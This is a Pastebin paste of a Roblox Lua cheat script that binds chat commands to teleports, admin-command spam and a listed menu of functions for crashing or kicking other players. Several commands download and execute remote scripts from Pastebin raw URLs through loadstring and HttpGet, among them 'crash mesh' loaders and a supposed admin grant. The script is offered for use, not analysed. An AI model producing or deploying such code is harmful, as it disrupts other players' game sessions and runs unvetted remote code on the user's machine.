Advertisement
Prokri43

Ah custom cmds2 for xyzah

Jul 11th, 2024 (edited)
268
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.76 KB | None | 0 0
  1. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  2. if msg == ",cmds" then print("house-tps u to house")
  3. print(",pads-tps u to admin pads")
  4. print("spawn-tps u to spawn")
  5. print("Domain Expansion!-runs Domain Expansion: the void")
  6. print(",dps-delete parts(lag) alternative is .delparts")
  7. print(",brpads/badmin-blocks resetpad and admin alt is .blockrpads, .blockadmin")
  8. print(",pc-Shows u partcount")
  9. print(",loadmesh-loads crash mesh no save needed")
  10. print(",clonemesh-clones crash mesh no save needed")
  11. print(",lncmesh-loads crash, saves waypoint, and clones full auto")
  12. print(",admin-gives u admin")
  13. print("#banhammer-gives u a banhammer that instead of banning it crashes")
  14. print(",hop-takes u to new server")
  15. print("#rspy-loads remote spy(broken)")
  16. print("#dex-loads dex explorer")
  17. print("#crash (player)-crashes a player using bypassed crash")
  18. print("#kick (player)-kicks a player with namecrash")
  19. print("#vcrash (player)-sets up a vote in chat to crash a player")
  20. print("#skick (player)-uses skateboard to kick a player (broken)")
  21. print("#clean-cleans the server and fixes everything (almost)")
  22. end
  23. end)
  24.  
  25. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  26. if msg == ",house" then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(x, 28.3, 82.4)
  27. x = x - 4
  28. wait(0.01)
  29. end
  30. end)
  31. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  32. if msg == ",pads" then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(x, 28.3, 106.4)
  33. x = x - 4
  34. wait(0.01)
  35. end
  36. end)
  37.  
  38.  
  39. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  40.  
  41. if msg == ",spawn" then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(x, 20, -42)
  42. x = x - 4
  43. wait(0.01)
  44. end
  45. end)
  46.  
  47. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  48.  
  49. if msg == "Domain Expansion!" then game.Players:Chat(":runc the void")
  50. end
  51. end)
  52.  
  53. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  54.  
  55. if msg == ",dps" then game.Players:Chat(".delparts")
  56. end
  57. end)
  58.  
  59. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  60.  
  61. if msg == ",bpads" then game.Players:Chat(".blockrpads")
  62. end
  63. end)
  64.  
  65. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  66.  
  67. if msg == ",start" then game.Players:Chat(":loadb plane4 | :ws me 30 ")
  68. end
  69. end)
  70.  
  71. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  72.  
  73. if msg == ",crashhammer" then game.Players:Chat(".banhammer")
  74. end
  75. end)
  76.  
  77. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  78.  
  79. if msg == ",badmin" then game.Players:Chat(".blockadmin")
  80. end
  81. end)
  82.  
  83. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  84.  
  85. if msg == ",unbpads" then game.Players:Chat(".unblockrpads")
  86. end
  87. end)
  88.  
  89. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  90.  
  91. if msg == ",unbadmin" then game.Players:Chat(".unblockadmin")
  92. end
  93. end)
  94.  
  95. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  96.  
  97. if msg == ",hop" then game.Players:Chat("!newserver")
  98. end
  99. end)
  100.  
  101. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  102.  
  103. if msg == ",pc" then game.Players:Chat(":partcount")
  104. end
  105. end)
  106.  
  107. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  108.  
  109. if msg == ",admin" then
  110. loadstring(game:HttpGet("https://pastebin.com/raw/xrGjYXJP"))()
  111. end
  112. end)
  113.  
  114. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  115.  
  116. if msg == ",loadmesh" then
  117. loadstring(game:HttpGet("https://pastebin.com/raw/xrGjYXJP"))()
  118. end
  119. end)
  120.  
  121. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  122.  
  123. if msg == ",clonemesh" then
  124. loadstring(game:HttpGet("https://pastebin.com/raw/nbFx0ZfD"))()
  125. end
  126. end)
  127.  
  128. game.Players.LocalPlayer.Chatted:Connect(function(msg)
  129.  
  130. if msg == ",lncmesh" then
  131. loadstring(game:HttpGet("https://pastebin.com/raw/uFMmgnAK"))()
  132. end
  133. end)
  134.  
  135.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement